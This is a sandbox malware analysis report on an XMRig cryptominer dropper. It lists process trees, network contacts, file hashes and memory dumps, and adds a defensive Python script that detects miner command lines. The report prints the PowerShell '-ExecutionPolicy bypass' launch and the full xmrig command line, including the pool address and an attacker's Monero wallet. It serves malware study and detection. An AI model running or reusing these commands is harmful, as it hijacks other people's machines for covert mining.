Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
XMRig Miner payload
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 20:12
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
294s
Max time network
302s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(30 identical all-N/A rows collapsed to one; the report records no description, indicator, process or target for this rule's hits)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3320 wrote to memory of 4000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3320 wrote to memory of 4000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
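The process tree above is the whole story of this sample: PowerShell started with -ExecutionPolicy bypass on a script in %TEMP%, which then runs a freshly dropped xmrig.exe pointed at a stratum+ssl pool on port 443 with a Monero wallet in -u. Because the pool connection is TLS on 443, port-based filtering will not separate it from web traffic; the command line and the DNS name are the reliable handles. The following is an added example, not part of the report: Python detection logic that parses XMRig-style command lines out of process-creation records, extracts pool, wallet and worker, and links the miner back to a PowerShell parent launched with -ExecutionPolicy bypass. The record shape (pid, ppid, image, command line), the benign control event and the PowerShell process's parent PID are constructed for the example; the pool-domain list is taken from the report's Network tables and should be extended from your own intel.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed process-creation records: (pid, ppid, image path, command line).
# The first two mirror the Processes section of the report (PID 3320 -> 4000);
# the third is a benign control. None of this is raw sandbox telemetry.
SAMPLE_EVENTS = [
    (3320, 1234, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"'),
    (4000, 3320, r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
     r"-o stratum+ssl://rx.unmineable.com:443 "
     r"-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF"
     r".unmineable_worker_vilqtiac -p x"),
    (5100, 800, r"C:\Windows\System32\notepad.exe", r'notepad.exe "C:\Users\Admin\Desktop\notes.txt"'),
]

# Standard Monero address (prefix 4) or subaddress (prefix 8): 95 Base58 characters.
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
# Pool URL in the form XMRig accepts for -o/--url: scheme, host, optional port.
STRATUM_URL = re.compile(r"^stratum\+(tcp|ssl)://([^:/]+)(?::(\d+))?$", re.I)
# Pool domains seen in this report's Network tables; extend from your own intel.
KNOWN_POOL_SUFFIXES = ("unmineable.com",)
# XMRig option spellings mapped to a canonical key (short and long forms).
XMRIG_OPTS = {
    "-a": "algo", "--algo": "algo",
    "-o": "url", "--url": "url",
    "-u": "user", "--user": "user",
    "-p": "pass", "--pass": "pass",
    "-t": "threads", "--threads": "threads",
}


@dataclass
class Finding:
    pid: int
    image: str
    reasons: list = field(default_factory=list)
    pool_host: Optional[str] = None
    wallet: Optional[str] = None
    worker: Optional[str] = None


def tokenize(cmdline: str) -> list:
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted if quoted else bare
            for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_miner_args(tokens: list) -> dict:
    """Map XMRig-style options (-o URL, --url URL, --url=URL) to canonical keys."""
    opts = {}
    i = 1  # tokens[0] is the image
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--") and "=" in tok:
            key, val = tok.split("=", 1)
            if key in XMRIG_OPTS:
                opts[XMRIG_OPTS[key]] = val
            i += 1
        elif tok in XMRIG_OPTS and i + 1 < len(tokens):
            opts[XMRIG_OPTS[tok]] = tokens[i + 1]
            i += 2
        else:
            i += 1
    return opts


def analyse_miner_cmdline(pid: int, image: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding when the command line carries miner indicators, else None."""
    opts = parse_miner_args(tokenize(cmdline))
    finding = Finding(pid, image)
    m = STRATUM_URL.match(opts.get("url", ""))
    if m:
        finding.pool_host = m.group(2).lower()
        finding.reasons.append(f"stratum pool URL ({m.group(1).lower()}, port {m.group(3) or 'default'})")
        if finding.pool_host.endswith(KNOWN_POOL_SUFFIXES):
            finding.reasons.append(f"known mining pool {finding.pool_host}")
    # unMineable form is COIN:<address>.<worker>; plain XMRig form is <address>[.<worker>].
    _, _, addr_part = opts.get("user", "").rpartition(":")
    addr, _, worker = addr_part.partition(".")
    if MONERO_ADDR.match(addr):
        finding.wallet, finding.worker = addr, (worker or None)
        finding.reasons.append("Monero wallet address in -u")
    if opts.get("algo", "").lower().startswith("rx"):
        finding.reasons.append("RandomX algorithm selected (-a rx)")
    return finding if finding.reasons else None


def find_miner_chains(events: list) -> list:
    """Flag miner-like processes and note a PowerShell parent run with -ExecutionPolicy bypass."""
    by_pid = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}
    findings = []
    for pid, ppid, image, cmd in events:
        finding = analyse_miner_cmdline(pid, image, cmd)
        if finding is None:
            continue
        parent = by_pid.get(ppid)
        if parent and parent[1].lower().endswith("powershell.exe") \
                and re.search(r"-executionpolicy\s+bypass", parent[2], re.I):
            finding.reasons.append(f"spawned by PowerShell (PID {ppid}) with -ExecutionPolicy bypass")
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_miner_chains(SAMPLE_EVENTS):
        print(f"PID {f.pid} {f.image}")
        print(f"  pool={f.pool_host} wallet={f.wallet} worker={f.worker}")
        for reason in f.reasons:
            print(f"  - {reason}")
```

The wallet address is the most durable indicator here: the pool, the file name and the script copies can all change between builds, but the payout address must stay the same for the operator to get paid, so it is worth hunting across the fleet for any command line that contains it.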
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
memory/3320-0-0x00007FFB96663000-0x00007FFB96665000-memory.dmp
memory/3320-1-0x0000018DB51B0000-0x0000018DB51D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ofaevxms.uce.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3320-10-0x00007FFB96660000-0x00007FFB97122000-memory.dmp
memory/3320-11-0x00007FFB96660000-0x00007FFB97122000-memory.dmp
memory/3320-12-0x00007FFB96660000-0x00007FFB97122000-memory.dmp
memory/3320-14-0x0000018DCD830000-0x0000018DCD842000-memory.dmp
memory/3320-15-0x0000018DB5200000-0x0000018DB520A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4000-46-0x000001760F2E0000-0x000001760F300000-memory.dmp
memory/4000-47-0x00000176A1890000-0x00000176A18B0000-memory.dmp
memory/3320-48-0x00007FFB96663000-0x00007FFB96665000-memory.dmp
memory/3320-49-0x00007FFB96660000-0x00007FFB97122000-memory.dmp
memory/4000-50-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/3320-51-0x00007FFB96660000-0x00007FFB97122000-memory.dmp
memory/4000-52-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-54-0x00000176A1F00000-0x00000176A1F20000-memory.dmp
memory/4000-53-0x00000176A1EE0000-0x00000176A1F00000-memory.dmp
memory/4000-55-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-56-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-57-0x00000176A1EE0000-0x00000176A1F00000-memory.dmp
memory/4000-58-0x00000176A1F00000-0x00000176A1F20000-memory.dmp
memory/4000-59-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-60-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-61-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-62-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-63-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-64-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-65-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-66-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-67-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-68-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-69-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-70-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-71-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-72-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-73-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-74-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-75-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-76-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-77-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-78-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-79-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-80-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-81-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-82-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win7-20240221-en
Max time kernel
118s
Max time network
122s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
Network
Files
memory/2880-4-0x000007FEF60DE000-0x000007FEF60DF000-memory.dmp
memory/2880-5-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2880-7-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2880-6-0x0000000002310000-0x0000000002318000-memory.dmp
memory/2880-8-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2880-9-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2880-10-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2880-11-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240426-en
Max time kernel
295s
Max time network
255s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(24 identical all-N/A rows collapsed to one; the report records no description, indicator, process or target for this rule's hits)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2168 wrote to memory of 2644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2168 wrote to memory of 2644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
Files
memory/2168-0-0x00007FFCF84D3000-0x00007FFCF84D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xslfdsct.2g5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2168-9-0x0000029B6B1F0000-0x0000029B6B212000-memory.dmp
memory/2168-10-0x00007FFCF84D0000-0x00007FFCF8F92000-memory.dmp
memory/2168-11-0x00007FFCF84D0000-0x00007FFCF8F92000-memory.dmp
memory/2168-12-0x00007FFCF84D0000-0x00007FFCF8F92000-memory.dmp
memory/2168-13-0x00007FFCF84D3000-0x00007FFCF84D5000-memory.dmp
memory/2168-14-0x00007FFCF84D0000-0x00007FFCF8F92000-memory.dmp
memory/2168-15-0x00007FFCF84D0000-0x00007FFCF8F92000-memory.dmp
memory/2168-18-0x0000029B6B1E0000-0x0000029B6B1EA000-memory.dmp
memory/2168-17-0x0000029B6B3B0000-0x0000029B6B3C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2644-49-0x000001AB55990000-0x000001AB559B0000-memory.dmp
memory/2644-50-0x000001AB559E0000-0x000001AB55A00000-memory.dmp
memory/2644-51-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-52-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-53-0x000001AB55A20000-0x000001AB55A40000-memory.dmp
memory/2644-54-0x000001AB55A00000-0x000001AB55A20000-memory.dmp
memory/2644-55-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-56-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-59-0x000001AB55A00000-0x000001AB55A20000-memory.dmp
memory/2644-57-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-58-0x000001AB55A20000-0x000001AB55A40000-memory.dmp
memory/2644-60-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-61-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-62-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-63-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-64-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-65-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-66-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-67-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-68-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-69-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-70-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-71-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-72-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-73-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-74-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-75-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-76-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-77-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
294s
Max time network
301s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(27 identical all-N/A rows collapsed to one; the report records no description, indicator, process or target for this rule's hits)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5044 wrote to memory of 2552 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5044 wrote to memory of 2552 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/5044-2-0x00007FFCAE013000-0x00007FFCAE014000-memory.dmp
memory/5044-5-0x000001E771860000-0x000001E771882000-memory.dmp
memory/5044-8-0x00007FFCAE010000-0x00007FFCAE9FC000-memory.dmp
memory/5044-9-0x000001E771A10000-0x000001E771A86000-memory.dmp
memory/5044-10-0x00007FFCAE010000-0x00007FFCAE9FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5q3vjdz.rdo.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5044-25-0x00007FFCAE010000-0x00007FFCAE9FC000-memory.dmp
memory/5044-29-0x00007FFCAE013000-0x00007FFCAE014000-memory.dmp
memory/5044-30-0x00007FFCAE010000-0x00007FFCAE9FC000-memory.dmp
memory/5044-31-0x00007FFCAE010000-0x00007FFCAE9FC000-memory.dmp
memory/5044-64-0x000001E7719F0000-0x000001E7719FA000-memory.dmp
memory/5044-51-0x000001E771B90000-0x000001E771BA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2552-93-0x0000024242BC0000-0x0000024242BE0000-memory.dmp
memory/2552-94-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-95-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-96-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-97-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-98-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-99-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-100-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-101-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-102-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-103-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-104-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-105-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-106-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-107-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-108-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-109-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-110-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-111-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-112-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
